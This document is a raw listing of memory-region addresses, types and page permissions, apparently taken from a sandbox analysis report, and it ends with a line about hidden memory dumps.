stack
page read and write
518B000
trusted library allocation
page read and write
5762000
heap
page read and write
579F000
stack
page read and write
6A45000
heap
page read and write
71C000
stack
page read and write
6A6E000
heap
page read and write
73DF000
heap
page read and write
737E000
stack
page read and write
5020000
heap
page read and write
78A0000
heap
page read and write
8040000
trusted library allocation
page execute and read and write
7620000
trusted library allocation
page read and write
5762000
heap
page read and write
759000
stack
page read and write
72FD000
stack
page read and write
70ED000
stack
page read and write
65B1000
trusted library allocation
page read and write
54B9000
heap
page read and write
8520000
trusted library allocation
page read and write
BB6000
heap
page read and write
33AC000
heap
page read and write
72BD000
stack
page read and write
6D5E000
stack
page read and write
6CF0000
heap
page execute and read and write
6A4B000
heap
page read and write
4750000
trusted library allocation
page read and write
6581000
heap
page read and write
73EE000
heap
page read and write
8660000
heap
page read and write
7826000
heap
page read and write
5507000
heap
page read and write
574E000
heap
page read and write
6A4B000
heap
page read and write
2F2E000
heap
page read and write
8090000
trusted library allocation
page read and write
6565000
heap
page read and write
31D0000
heap
page read and write
5731000
heap
page read and write
4E2D000
heap
page read and write
3391000
heap
page read and write
4CE000
stack
page read and write
33AA000
heap
page read and write
DC5000
trusted library allocation
page execute and read and write
2F1E000
heap
page read and write
DAC000
heap
page read and write
3412000
trusted library allocation
page read and write
5505000
heap
page read and write
2894000
heap
page read and write
FCF000
stack
page read and write
4DA8000
trusted library allocation
page read and write
2E61000
heap
page read and write
6996000
heap
page read and write
4DC9000
heap
page read and write
7400000
trusted library allocation
page read and write
5451000
heap
page read and write
4EB0000
heap
page execute and read and write
33D0000
trusted library allocation
page read and write
6A32000
heap
page read and write
550A000
heap
page read and write
73EA000
heap
page read and write
4B2E000
stack
page read and write
73D8000
heap
page read and write
6A8B000
heap
page read and write
5256000
trusted library allocation
page read and write
B09000
heap
page read and write
2EEB000
heap
page read and write
5762000
heap
page read and write
5A1E000
stack
page read and write
AF4000
stack
page read and write
6565000
heap
page read and write
910000
heap
page read and write
6A8D000
heap
page read and write
6A9D000
heap
page read and write
2E90000
heap
page read and write
2BAF000
stack
page read and write
3A0000
heap
page read and write
6A8B000
heap
page read and write
8896000
heap
page read and write
11A0000
heap
page read and write
7256000
trusted library allocation
page read and write
339A000
heap
page read and write
87C0000
trusted library allocation
page read and write
3391000
heap
page read and write
6231000
trusted library allocation
page read and write
6A76000
heap
page read and write
3707000
heap
page read and write
8820000
heap
page read and write
338B000
heap
page read and write
6650000
trusted library allocation
page read and write
315B000
stack
page read and write
BEC000
stack
page read and write
5839000
heap
page read and write
4E18000
heap
page read and write
12CE000
stack
page read and write
6513000
heap
page read and write
706E000
stack
page read and write
6A76000
heap
page read and write
6BED000
trusted library allocation
page read and write
4EA0000
heap
page read and write
570F000
trusted library allocation
page read and write
B4E000
stack
page read and write
7BD0000
trusted library allocation
page read and write
6A54000
heap
page read and write
4CD4000
heap
page read and write
7BAE000
stack
page read and write
6A6E000
heap
page read and write
28B3000
heap
page read and write
6A84000
heap
page read and write
5F39000
trusted library allocation
page read and write
A10000
heap
page read and write
6584000
heap
page read and write
5253000
trusted library allocation
page read and write
ABF000
heap
page read and write
4740000
trusted library allocation
page execute and read and write
6A97000
heap
page read and write
3706000
heap
page read and write
32C5000
trusted library allocation
page execute and read and write
7610000
trusted library allocation
page read and write
551B000
heap
page read and write
6A97000
heap
page read and write
550D000
heap
page read and write
751E000
stack
page read and write
73A1000
heap
page read and write
60DE000
trusted library allocation
page read and write
508F000
stack
page read and write
4CD6000
heap
page read and write
327F000
stack
page read and write
5007000
trusted library allocation
page read and write
282C000
stack
page read and write
6AC2000
heap
page read and write
2F16000
heap
page read and write
33E3000
trusted library allocation
page execute and read and write
2E51000
heap
page read and write
7866000
heap
page read and write
6A84000
heap
page read and write
4CF9000
trusted library allocation
page read and write
1040000
heap
page read and write
6F40000
heap
page read and write
4E18000
heap
page read and write
7020000
heap
page execute and read and write
5D09000
trusted library allocation
page read and write
400000
system
page execute and read and write
7408000
heap
page read and write
582E000
heap
page read and write
7897000
heap
page read and write
6A0A000
heap
page read and write
7B5E000
stack
page read and write
881E000
stack
page read and write
71BD000
stack
page read and write
304C000
heap
page read and write
7872000
heap
page read and write
85D000
stack
page read and write
7FAF0000
trusted library allocation
page execute and read and write
4EC0000
heap
page read and write
2F1E000
heap
page read and write
4E0A000
heap
page read and write
4563000
trusted library allocation
page execute and read and write
2E62000
heap
page read and write
3387000
heap
page read and write
6A8B000
heap
page read and write
339D000
heap
page read and write
7370000
heap
page read and write
7670000
trusted library allocation
page read and write
6AB4000
heap
page read and write
4F91000
trusted library allocation
page read and write
2E5D000
heap
page read and write
32E0000
trusted library allocation
page read and write
879E000
stack
page read and write
4EA0000
trusted library allocation
page read and write
6A8D000
heap
page read and write
6514000
heap
page read and write
74FE000
stack
page read and write
2E3F000
heap
page read and write
4560000
trusted library allocation
page read and write
6A8D000
heap
page read and write
4592000
trusted library allocation
page read and write
2F03000
heap
page read and write
AECE000
stack
page read and write
8C0000
heap
page read and write
5B9D000
stack
page read and write
6A50000
heap
page read and write
719C000
stack
page read and write
2F0D000
heap
page read and write
4EC6000
heap
page read and write
6890000
trusted library allocation
page read and write
5762000
heap
page read and write
7580000
trusted library allocation
page execute and read and write
6AB2000
heap
page read and write
6CF5000
heap
page execute and read and write
6A92000
heap
page read and write
48CD000
trusted library allocation
page read and write
456000
system
page execute and read and write
6A97000
heap
page read and write
5F0000
heap
page read and write
7032000
heap
page read and write
34BE000
stack
page read and write
6513000
heap
page read and write
6E6F000
stack
page read and write
8868000
heap
page read and write
6AE6000
heap
page read and write
54B9000
heap
page read and write
DFC000
stack
page read and write
3410000
trusted library allocation
page read and write
327F000
stack
page read and write
E48000
heap
page read and write
64A0000
heap
page read and write
347E000
stack
page read and write
6A84000
heap
page read and write
2F16000
heap
page read and write
55DE000
stack
page read and write
3700000
heap
page read and write
7A6E000
stack
page read and write
72DF000
heap
page read and write
3019000
heap
page read and write
27FE000
stack
page read and write
6A9D000
heap
page read and write
4EFC000
stack
page read and write
4DE9000
heap
page read and write
D4C000
stack
page read and write
6513000
heap
page read and write
4CE1000
trusted library allocation
page read and write
6A92000
heap
page read and write
7B00000
trusted library allocation
page read and write
8174000
heap
page read and write
7392000
heap
page read and write
DA9000
trusted library allocation
page read and write
6C8E000
stack
page read and write
6A7B000
heap
page read and write
5871000
trusted library allocation
page read and write
5480000
heap
page read and write
5505000
heap
page read and write
689E000
trusted library allocation
page read and write
4DEB000
trusted library allocation
page read and write
2F10000
heap
page read and write
D94000
trusted library allocation
page read and write
2D60000
heap
page read and write
2E6F000
heap
page read and write
57AD000
trusted library allocation
page read and write
4E29000
heap
page read and write
63C5000
trusted library allocation
page read and write
AA0000
heap
page read and write
78D3000
heap
page read and write
4DC8000
heap
page read and write
7BE0000
trusted library allocation
page read and write
7647000
trusted library allocation
page read and write
6513000
heap
page read and write
2F18000
heap
page read and write
6581000
heap
page read and write
2AAE000
stack
page read and write
65A3000
trusted library allocation
page read and write
4D90000
heap
page read and write
6565000
heap
page read and write
6B30000
trusted library allocation
page read and write
6DFE000
stack
page read and write
B0E000
stack
page read and write
2E80000
heap
page read and write
474000
remote allocation
page execute and read and write
78E6000
heap
page read and write
4E5F000
stack
page read and write
B01000
heap
page read and write
712E000
stack
page read and write
762E000
stack
page read and write
6D9E000
stack
page read and write
7C30000
trusted library allocation
page read and write
6AAC000
heap
page read and write
45C000
system
page execute and read and write
7A90000
trusted library allocation
page read and write
73FF000
stack
page read and write
C20000
heap
page read and write
2D40000
heap
page read and write
6A90000
heap
page read and write
6534000
heap
page read and write
B48000
heap
page read and write
5E0000
heap
page read and write
6A8D000
heap
page read and write
E20000
heap
page read and write
7025000
heap
page execute and read and write
3374000
heap
page read and write
6554000
heap
page read and write
6581000
heap
page read and write
51BE000
stack
page read and write
696E000
heap
page read and write
400000
system
page execute and read and write
B4A000
heap
page read and write
6299000
trusted library allocation
page read and write
582A000
heap
page read and write
7AC0000
trusted library allocation
page read and write
CFE000
stack
page read and write
4579000
trusted library allocation
page read and write
7810000
heap
page execute and read and write
8D9F000
stack
page read and write
726E000
stack
page read and write
2CF7000
stack
page read and write
2E27000
heap
page read and write
9A21000
trusted library allocation
page read and write
69FE000
heap
page read and write
85DF000
stack
page read and write
339C000
heap
page read and write
50BD000
stack
page read and write
336F000
heap
page read and write
762E000
stack
page read and write
8550000
trusted library allocation
page read and write
72FA000
stack
page read and write
33B1000
heap
page read and write
2E65000
heap
page read and write
5709000
heap
page read and write
6A84000
heap
page read and write
7820000
heap
page read and write
6AAC000
heap
page read and write
10001000
direct allocation
page execute and read and write
2F19000
heap
page read and write
3B1E000
heap
page read and write
6A54000
heap
page read and write
843E000
stack
page read and write
2840000
heap
page read and write
67D0000
trusted library allocation
page read and write
6513000
heap
page read and write
888C000
stack
page read and write
10FB000
heap
page read and write
4F9C000
trusted library allocation
page read and write
6657000
trusted library allocation
page read and write
2F18000
heap
page read and write
AE80000
trusted library allocation
page read and write
51D4000
heap
page read and write
33AE000
heap
page read and write
2CAE000
stack
page read and write
5292000
trusted library allocation
page read and write
4E16000
heap
page read and write
47B0000
direct allocation
page read and write
6A90000
heap
page read and write
64B0000
heap
page read and write
6A08000
heap
page read and write
574E000
heap
page read and write
12F5000
heap
page read and write
4E1E000
stack
page read and write
D50000
heap
page read and write
AEF000
stack
page read and write
4DD2000
heap
page read and write
2891000
heap
page read and write
329D000
trusted library allocation
page execute and read and write
33B3000
heap
page read and write
6521000
heap
page read and write
2F16000
heap
page read and write
6534000
heap
page read and write
7A80000
trusted library allocation
page read and write
2ED4000
heap
page read and write
BA5000
heap
page read and write
76B0000
heap
page read and write
45E7000
heap
page read and write
5443000
heap
page read and write
815C000
heap
page read and write
766F000
stack
page read and write
69BA000
heap
page read and write
46EC000
stack
page read and write
4670000
heap
page read and write
528F000
stack
page read and write
7269000
heap
page read and write
33A1000
heap
page read and write
655D000
heap
page read and write
56C000
stack
page read and write
473E000
stack
page read and write
7640000
trusted library allocation
page read and write
573E000
heap
page read and write
D80000
trusted library allocation
page read and write
370B000
heap
page read and write
7B1F000
stack
page read and write
68E0000
trusted library allocation
page read and write
2E10000
heap
page read and write
BAE000
stack
page read and write
300E000
stack
page read and write
6A89000
heap
page read and write
33B6000
heap
page read and write
2F10000
heap
page read and write
78C0000
trusted library allocation
page read and write
2EFB000
heap
page read and write
305B000
stack
page read and write
575E000
heap
page read and write
64F8000
heap
page read and write
78E0000
trusted library allocation
page read and write
700E000
stack
page read and write
5220000
heap
page execute and read and write
6521000
heap
page read and write
6A9D000
heap
page read and write
33BA000
heap
page read and write
8150000
heap
page read and write
2E66000
heap
page read and write
3B0000
heap
page read and write
28B0000
heap
page read and write
5428000
heap
page read and write
56DF000
stack
page read and write
352F000
stack
page read and write
6D1E000
stack
page read and write
6A84000
heap
page read and write
70EE000
stack
page read and write
4DB0000
heap
page read and write
2FD0000
heap
page read and write
2DFD000
stack
page read and write
4FB0000
heap
page read and write
6513000
heap
page read and write
4BAE000
stack
page read and write
7610000
trusted library allocation
page read and write
522F000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
BE6000
heap
page read and write
7B6F000
stack
page read and write
6514000
heap
page read and write
6A76000
heap
page read and write
AF0E000
stack
page read and write
6A9D000
heap
page read and write
75E0000
trusted library allocation
page read and write
3A42000
heap
page read and write
790000
heap
page read and write
4BF0000
heap
page execute and read and write
79CE000
stack
page read and write
7264000
heap
page read and write
57DB000
stack
page read and write
54C3000
heap
page read and write
BB0000
heap
page read and write
6EFE000
stack
page read and write
3010000
heap
page read and write
C28000
stack
page read and write
2E1A000
heap
page read and write
333E000
heap
page read and write
73F7000
heap
page read and write
6A92000
heap
page read and write
12D0000
heap
page read and write
56E1000
heap
page read and write
463E000
stack
page read and write
6A35000
heap
page read and write
3999000
heap
page read and write
3330000
heap
page read and write
69FC000
heap
page read and write
6A8B000
heap
page read and write
7AE0000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
33E4000
trusted library allocation
page read and write
6A9D000
heap
page read and write
696E000
heap
page read and write
7F940000
trusted library allocation
page execute and read and write
6553000
heap
page read and write
7692000
heap
page read and write
57C4000
heap
page read and write
6D9E000
stack
page read and write
72B9000
heap
page read and write
56E0000
heap
page read and write
51D0000
heap
page read and write
C70000
heap
page read and write
5762000
heap
page read and write
7850000
heap
page read and write
6553000
heap
page read and write
478000
remote allocation
page execute and read and write
3373000
heap
page read and write
2E72000
heap
page read and write
32A9000
trusted library allocation
page read and write
5706000
heap
page read and write
5386000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
33A0000
heap
page read and write
6A92000
heap
page read and write
4EC3000
heap
page read and write
85F0000
heap
page read and write
6A66000
heap
page read and write
75FD000
trusted library allocation
page read and write
2F1A000
heap
page read and write
6A8B000
heap
page read and write
7790000
heap
page read and write
2F10000
heap
page read and write
7C70000
trusted library allocation
page read and write
56F1000
heap
page read and write
54C1000
heap
page read and write
852E000
trusted library allocation
page read and write
3398000
heap
page read and write
6A54000
heap
page read and write
504F000
trusted library allocation
page read and write
69FE000
heap
page read and write
2E51000
heap
page read and write
7300000
heap
page read and write
4E90000
trusted library allocation
page execute and read and write
2870000
heap
page read and write
88DB000
heap
page read and write
54C3000
heap
page read and write
2F1E000
heap
page read and write
30BF000
heap
page read and write
699B000
heap
page read and write
6A97000
heap
page read and write
78CB000
heap
page read and write
8695000
trusted library allocation
page read and write
4E02000
heap
page read and write
2E65000
heap
page read and write
3280000
trusted library allocation
page read and write
5F31000
trusted library allocation
page read and write
6A6B000
heap
page read and write
33C000
stack
page read and write
6A84000
heap
page read and write
6A36000
heap
page read and write
8520000
trusted library allocation
page read and write
6D8F000
stack
page read and write
342E000
stack
page read and write
6C0D000
trusted library allocation
page read and write
65A1000
trusted library allocation
page read and write
63E5000
trusted library allocation
page read and write
65A5000
trusted library allocation
page read and write
4C3E000
stack
page read and write
4DAD000
trusted library allocation
page read and write
57E0000
heap
page read and write
350F000
stack
page read and write
4860000
heap
page execute and read and write
4FE8000
trusted library allocation
page read and write
8670000
trusted library allocation
page execute and read and write
6654000
trusted library allocation
page read and write
370B000
heap
page read and write
838F000
stack
page read and write
4E30000
heap
page read and write
EC0000
heap
page read and write
65B5000
trusted library allocation
page read and write
4DCC000
trusted library allocation
page read and write
8610000
trusted library allocation
page read and write
639E000
stack
page read and write
6998000
heap
page read and write
3080000
heap
page read and write
DC0000
trusted library allocation
page read and write
798E000
stack
page read and write
6AAC000
heap
page read and write
45C0000
heap
page readonly
75D0000
trusted library allocation
page read and write
7403000
heap
page read and write
340A000
trusted library allocation
page execute and read and write
74FD000
stack
page read and write
6A84000
heap
page read and write
716E000
stack
page read and write
33ED000
trusted library allocation
page execute and read and write
7890000
trusted library allocation
page read and write
4740000
heap
page read and write
70AF000
stack
page read and write
6513000
heap
page read and write
31D5000
heap
page read and write
724A000
heap
page read and write
288A000
heap
page read and write
33F0000
trusted library allocation
page read and write
45F0000
trusted library allocation
page read and write
6A54000
heap
page read and write
2ECB000
heap
page read and write
780C000
heap
page read and write
7D20000
direct allocation
page read and write
8530000
trusted library allocation
page read and write
78B8000
heap
page read and write
64AC000
heap
page read and write
4DA0000
trusted library allocation
page read and write
6A4B000
heap
page read and write
4DA5000
trusted library allocation
page read and write
2E51000
heap
page read and write
AEC000
heap
page read and write
6A5B000
heap
page read and write
6534000
heap
page read and write
5763000
heap
page read and write
500E000
stack
page read and write
D9D000
trusted library allocation
page execute and read and write
5435000
heap
page read and write
7B9D000
stack
page read and write
3097000
heap
page read and write
8A40000
trusted library allocation
page execute and read and write
336D000
heap
page read and write
10DE000
stack
page read and write
6A8D000
heap
page read and write
874E000
stack
page read and write
7AA0000
trusted library allocation
page read and write
6C2C000
stack
page read and write
50FE000
stack
page read and write
59DB000
trusted library allocation
page read and write
6CBD000
stack
page read and write
68A0000
direct allocation
page read and write
3430000
trusted library allocation
page read and write
570E000
heap
page read and write
68A2000
direct allocation
page read and write
8050000
trusted library allocation
page read and write
64B2000
heap
page read and write
12DA000
heap
page read and write
7ADE000
stack
page read and write
6A6B000
heap
page read and write
513E000
stack
page read and write
7231000
heap
page read and write
8D5E000
stack
page read and write
7C20000
trusted library allocation
page read and write
550B000
heap
page read and write
2E85000
heap
page read and write
6DE0000
heap
page read and write
65AE000
trusted library allocation
page read and write
74A0000
trusted library allocation
page read and write
6534000
heap
page read and write
87B0000
trusted library allocation
page read and write
2FFE000
unkown
page read and write
DEE000
stack
page read and write
2F18000
heap
page read and write
2E3F000
heap
page read and write
7202000
heap
page read and write
DD9000
stack
page read and write
2EC0000
heap
page read and write
8680000
trusted library allocation
page read and write
6584000
heap
page read and write
5518000
heap
page read and write
6AAC000
heap
page read and write
2E7D000
stack
page read and write
2DB0000
heap
page read and write
33B6000
heap
page read and write
8820000
heap
page read and write
6A9D000
heap
page read and write
2E90000
heap
page read and write
58D9000
trusted library allocation
page read and write
56E9000
heap
page read and write
CDC000
stack
page read and write
88AA000
heap
page read and write
6563000
heap
page read and write
7050000
heap
page read and write
4E1D000
heap
page read and write
C2D000
stack
page read and write
5722000
heap
page read and write
77DC000
heap
page read and write
3290000
trusted library allocation
page read and write
DA0000
heap
page read and write
7828000
heap
page read and write
71F0000
heap
page read and write
7652000
trusted library allocation
page read and write
3301000
heap
page read and write
AA20000
trusted library section
page read and write
5F2F000
stack
page read and write
DFE000
stack
page read and write
477E000
stack
page read and write
4590000
trusted library allocation
page read and write
8750000
heap
page read and write
D90000
trusted library allocation
page read and write
33F9000
trusted library allocation
page read and write
583E000
heap
page read and write
798000
stack
page read and write
851E000
stack
page read and write
2E72000
heap
page read and write
33E0000
trusted library allocation
page read and write
73C6000
heap
page read and write
6521000
heap
page read and write
8540000
trusted library allocation
page read and write
ADD000
heap
page read and write
34F7000
heap
page read and write
2E99000
heap
page read and write
6581000
heap
page read and write
32F0000
heap
page read and write
4DF0000
trusted library allocation
page read and write
4CD0000
heap
page read and write
6A76000
heap
page read and write
316F000
stack
page read and write
8A61000
trusted library allocation
page read and write
47FE000
stack
page read and write
32D0000
heap
page read and write
6A0A000
heap
page read and write
4DBF000
heap
page read and write
10F0000
heap
page read and write
6583000
heap
page read and write
4564000
trusted library allocation
page read and write
859D000
stack
page read and write
28AD000
heap
page read and write
5746000
heap
page read and write
28B5000
heap
page read and write
B41000
heap
page read and write
5480000
heap
page read and write
2E6F000
heap
page read and write
6A54000
heap
page read and write
5461000
heap
page read and write
462E000
stack
page read and write
7833000
heap
page read and write
57C5000
heap
page read and write
31C0000
heap
page read and write
7C10000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
6A5C000
heap
page read and write
71AE000
stack
page read and write
591E000
stack
page read and write
7A4D000
stack
page read and write
86A0000
heap
page read and write
8BC0000
trusted library allocation
page read and write
7A0E000
stack
page read and write
75C000
stack
page read and write
77E2000
heap
page read and write
75DD000
stack
page read and write
6910000
heap
page read and write
6A9D000
heap
page read and write
483E000
stack
page read and write
6FEE000
stack
page read and write
5709000
heap
page read and write
65AA000
trusted library allocation
page read and write
26EC000
stack
page read and write
2E70000
heap
page read and write
886F000
heap
page read and write
33AD000
heap
page read and write
7BC0000
trusted library allocation
page read and write
712F000
stack
page read and write
CA0000
heap
page read and write
4E18000
heap
page read and write
2E65000
heap
page read and write
6A7C000
heap
page read and write
56E5000
heap
page read and write
2E20000
heap
page read and write
6521000
heap
page read and write
7856000
heap
page read and write
A50000
heap
page read and write
5762000
heap
page read and write
84DE000
stack
page read and write
34F0000
heap
page read and write
571E000
heap
page read and write
77AE000
stack
page read and write
339B000
heap
page read and write
2E6F000
heap
page read and write
AC4000
heap
page read and write
77FE000
heap
page read and write
74AE000
stack
page read and write
699E000
heap
page read and write
73F0000
trusted library allocation
page read and write
792D000
stack
page read and write
5060000
heap
page read and write
6A8B000
heap
page read and write
50C0000
trusted library allocation
page read and write
575A000
heap
page read and write
6999000
heap
page read and write
6900000
heap
page read and write
FD8000
heap
page read and write
4C7E000
stack
page read and write
7410000
trusted library section
page read and write
1090000
heap
page read and write
77BE000
heap
page read and write
5762000
heap
page read and write
3888000
heap
page read and write
2FF0000
heap
page read and write
78C5000
heap
page read and write
665F000
trusted library allocation
page read and write
6A65000
heap
page read and write
3415000
trusted library allocation
page execute and read and write
7600000
trusted library allocation
page read and write
6A6E000
heap
page read and write
AB0000
heap
page read and write
2FF7000
heap
page read and write
33C7000
heap
page read and write
8885000
heap
page read and write
5839000
heap
page read and write
10016000
direct allocation
page execute and read and write
743D000
stack
page read and write
4FF9000
trusted library allocation
page read and write
503C000
stack
page read and write
6C29000
trusted library allocation
page read and write
56FA000
heap
page read and write
6AB7000
heap
page read and write
3331000
heap
page read and write
3400000
trusted library allocation
page read and write
6996000
heap
page read and write
3810000
heap
page read and write
6521000
heap
page read and write
64A1000
heap
page read and write
74BE000
stack
page read and write
D3F000
stack
page read and write
6A76000
heap
page read and write
729C000
stack
page read and write
5B5E000
stack
page read and write
2F21000
heap
page read and write
7040000
heap
page read and write
3ABA000
heap
page read and write
6584000
heap
page read and write
10FB000
stack
page read and write
1060000
heap
page read and write
8510000
trusted library allocation
page execute and read and write
71CF000
stack
page read and write
6A92000
heap
page read and write
4CFB000
trusted library allocation
page read and write
6513000
heap
page read and write
7BF0000
trusted library allocation
page read and write
34C0000
heap
page readonly
1160000
heap
page read and write
334E000
stack
page read and write
578B000
trusted library allocation
page read and write
6A00000
heap
page read and write
4BEE000
stack
page read and write
2EBC000
heap
page read and write
56EC000
heap
page read and write
752E000
stack
page read and write
5D0000
heap
page read and write
32F2000
heap
page read and write
572E000
heap
page read and write
B2B000
heap
page read and write
57C3000
heap
page read and write
5231000
trusted library allocation
page read and write
5762000
heap
page read and write
354E000
stack
page read and write
6A6B000
heap
page read and write
4CDF000
heap
page read and write
4D0000
heap
page read and write
5088000
trusted library allocation
page read and write
5451000
heap
page read and write
4E1D000
heap
page read and write
7A70000
trusted library allocation
page read and write
718E000
stack
page read and write
6A08000
heap
page read and write
68B2000
direct allocation
page read and write
5755000
heap
page read and write
757A000
stack
page read and write
D88000
stack
page read and write
7218000
heap
page read and write
69F4000
heap
page read and write
339F000
heap
page read and write
7946000
trusted library allocation
page read and write
8600000
trusted library allocation
page execute and read and write
6A4B000
heap
page read and write
4DF7000
heap
page read and write
54B9000
heap
page read and write
559F000
stack
page read and write
2D70000
heap
page read and write
6A6F000
heap
page read and write
4550000
trusted library allocation
page read and write
7FA000
heap
page read and write
2E70000
heap
page read and write
4E29000
heap
page read and write
71C0000
heap
page execute and read and write
B4E000
heap
page read and write
7310000
heap
page read and write
6B60000
trusted library allocation
page read and write
8060000
trusted library allocation
page read and write
4570000
trusted library allocation
page read and write
5713000
trusted library allocation
page read and write
6A4E000
heap
page read and write
46FC000
stack
page read and write
4DC4000
heap
page read and write
3705000
heap
page read and write
2F16000
heap
page read and write
4CD0000
heap
page execute and read and write
29DA000
stack
page read and write
8FB000
stack
page read and write
655A000
heap
page read and write
698E000
heap
page read and write
4595000
trusted library allocation
page execute and read and write
7A7A000
trusted library allocation
page read and write
2F0D000
heap
page read and write
2D90000
heap
page read and write
5787000
trusted library allocation
page read and write
6AC1000
heap
page read and write
63D6000
trusted library allocation
page read and write
AE70000
trusted library allocation
page read and write
2F0D000
heap
page read and write
AD7000
stack
page read and write
747A000
stack
page read and write
2C30000
heap
page read and write
5446000
heap
page read and write
6553000
heap
page read and write
78A6000
heap
page read and write
64AD000
heap
page read and write
4680000
heap
page read and write
5589000
trusted library allocation
page read and write
6A54000
heap
page read and write
33A9000
heap
page read and write
32C2000
trusted library allocation
page read and write
3920000
heap
page read and write
6A00000
heap
page read and write
4E1D000
heap
page read and write
32F1000
heap
page read and write
3293000
trusted library allocation
page execute and read and write
5508000
heap
page read and write
1170000
heap
page read and write
33B5000
heap
page read and write
27BF000
stack
page read and write
2E75000
heap
page read and write
582E000
heap
page read and write
340E000
stack
page read and write
2D8E000
stack
page read and write
7C40000
trusted library allocation
page read and write
7570000
trusted library allocation
page read and write
6A97000
heap
page read and write
72C1000
heap
page read and write
4D15000
trusted library allocation
page read and write
7630000
trusted library allocation
page read and write
78D6000
heap
page read and write
7640000
trusted library allocation
page read and write
AB9000
heap
page read and write
AF2000
stack
page read and write
4871000
trusted library allocation
page read and write
3385000
heap
page read and write
306F000
stack
page read and write
338E000
stack
page read and write
2E16000
heap
page read and write
BCE000
stack
page read and write
64A5000
heap
page read and write
45D0000
trusted library allocation
page execute and read and write
57C3000
heap
page read and write
7D4E000
direct allocation
page read and write
54B0000
heap
page read and write
4F31000
trusted library allocation
page read and write
2F0B000
heap
page read and write
63DC000
trusted library allocation
page read and write
73D3000
heap
page read and write
49C7000
trusted library allocation
page read and write
57E1000
heap
page read and write
2F6F000
stack
page read and write
32F8000
heap
page read and write
4D98000
heap
page read and write
6994000
heap
page read and write
71FB000
stack
page read and write
338E000
heap
page read and write
C0E000
stack
page read and write
7030000
heap
page read and write
6A97000
heap
page read and write
2B5F000
stack
page read and write
6A8B000
heap
page read and write
2850000
heap
page read and write
BE0000
heap
page read and write
CD0000
heap
page read and write
6A8B000
heap
page read and write
7E0000
heap
page read and write
5A5D000
stack
page read and write
7B10000
trusted library allocation
page read and write
287C000
heap
page read and write
2E65000
heap
page read and write
6A2E000
heap
page read and write
704F000
stack
page read and write
56FC000
heap
page read and write
75A0000
trusted library allocation
page read and write
32C0000
trusted library allocation
page read and write
47BF000
stack
page read and write
ACB000
heap
page read and write
DC7000
trusted library allocation
page execute and read and write
2FCF000
stack
page read and write
6A08000
heap
page read and write
8A50000
trusted library allocation
page read and write
766E000
stack
page read and write
78CF000
heap
page read and write
473000
system
page execute and read and write
2BBE000
stack
page read and write
2C6F000
stack
page read and write
83FC000
stack
page read and write
574B000
heap
page read and write
2DB5000
heap
page read and write
6A6B000
heap
page read and write
6581000
heap
page read and write
5C9E000
stack
page read and write
6AAC000
heap
page read and write
7D0000
heap
page read and write
4BF5000
heap
page execute and read and write
5719000
heap
page read and write
4520000
heap
page read and write
54C1000
heap
page read and write
810E000
stack
page read and write
2F10000
heap
page read and write
6AC1000
heap
page read and write
6AAC000
heap
page read and write
There are 1309 hidden memdumps, click here to show them.